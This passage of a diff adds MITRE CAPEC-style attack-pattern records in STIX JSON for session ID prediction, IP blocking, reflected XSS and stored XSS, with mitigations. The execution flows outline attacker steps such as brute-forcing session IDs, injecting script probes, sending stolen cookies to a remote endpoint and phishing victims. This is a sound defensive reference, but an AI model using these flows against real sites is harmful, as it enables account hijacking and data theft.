+ { + "description": "Credential/Session Prediction", + "external_id": "18", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Credential/Session-Prediction" + }, + { + "description": "Session Prediction", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_Prediction" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Credential Falsification through Prediction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969", + "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find Session IDs: The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. Techniques
    An attacker makes many anonymous connections and records the session IDs assigned.
    An attacker makes authorized connections and records the session tokens or credentials issued.
  3. Characterize IDs: The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.

  4. Techniques
    Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
    Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
    Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.

Experiment

  1. Match issued IDs: The attacker brute forces different values of session ID and manages to predict a valid session ID.

  2. Techniques
    The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.

Exploit

  1. Use matched Session ID: The attacker uses the falsified session ID to access the target system.

  2. Techniques
    The attacker loads the session ID into their web browser and browses to restricted data or functionality.
    The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)." + ], + "x_capec_skills_required": { + "Low": "There are tools to brute force session ID. Those tools require a low level of knowledge.", + "Medium": "Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strong source of randomness to generate a session ID.", + "id": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9653be54-5c63-4cb9-a759-0537fc56da14", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use adequate length session IDs", + "id": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "modified": 
"2021-06-24T00:00:00.000Z", + "name": "coa-59-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b5dfcf0-d8fd-4206-b790-076311f94f3b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use information available to the user in order to generate session ID (e.g., time).", + "id": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faa68fd6-54d2-4ba3-ad2b-1dd82865bae5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ideas for creating random numbers are offered 
by Eastlake [RFC1750]", + "id": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c1ee684-47b3-455a-a377-97959a7a6492", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session ID if you expose it to the user. 
For instance session ID can be stored in a cookie in encrypted format.", + "id": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dafccdf5-4f55-4b8f-888e-9e37f2ccbbd5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary performing this type of attack drops packets destined for a target IP address. 
The aim is to prevent access to the service hosted at the target IP address.", + "external_references": [ + { + "external_id": "CAPEC-590", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/590.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman, Mohamed Ali Kaafar, Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014--02, IMC 2014", + "external_id": "REF-475", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IP Address Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking packets intended for a target IP address denies its availability to the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", + "id": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-590-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fba19fbc-d42f-448a-8713-882e084e8a75", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "target_ref": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. 
The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.", + "external_references": [ + { + "external_id": "CAPEC-591", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/591.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-604", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reflected XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary 
run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. 
For example, assume a vulnerable web application called ‘mysite’ dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker’s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim’s web browser then executes the injected script, thus compromising the victim’s machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fail to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38865cc3-9b96-4cac-807c-bf7bad91ecd3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d36c215-a1eb-43b0-891e-fa3bab2cf037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34cccb39-8413-4427-800d-cb131ff13a29", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently 
\"stored\" within the data storage of a vulnerable web application as valid input.", + "external_references": [ + { + "external_id": "CAPEC-592", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/592.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-605", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Stored XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486" + ], + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Stored XSS attack can enable an 
adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.", + "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." 
+ ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application. The adversary is looking for areas where user input is stored, such as user profiles, shopping carts, file managers, forums, blogs, and logs.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for stored XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to submit script in input fields that could be stored by the web application. If possible, the probe strings contain a unique identifier so they can be queried for after submitting to see if they are stored.
    Use a list of HTML special characters to submit in input fields that could be stored by the web application and check if they were properly encoded, replaced, or filtered out.
  3. Store malicious XSS content: Once the adversary has determined which stored locations are vulnerable to XSS, they will interact with the web application to store the malicious content. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

  4. Techniques
    Store a malicious script on a page that will execute when viewed by the victim.
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

  2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_extended_description": "\n Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attributes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fails to adequately sanitize or encode untrusted input.", + "An application that stores information provided by the user in data storage of some kind." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28c01d45-e477-41b8-b923-e1a759ec7c34", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e027d6bd-c85f-4585-8bae-468b1e9f5507", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc721152-28b2-4c41-8360-1075efd36665", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.", + "external_references": [ + { + "external_id": "CAPEC-593", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Browser Session Hijacking", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Use Alternate Authentication Material:Application Access Token", + "external_id": 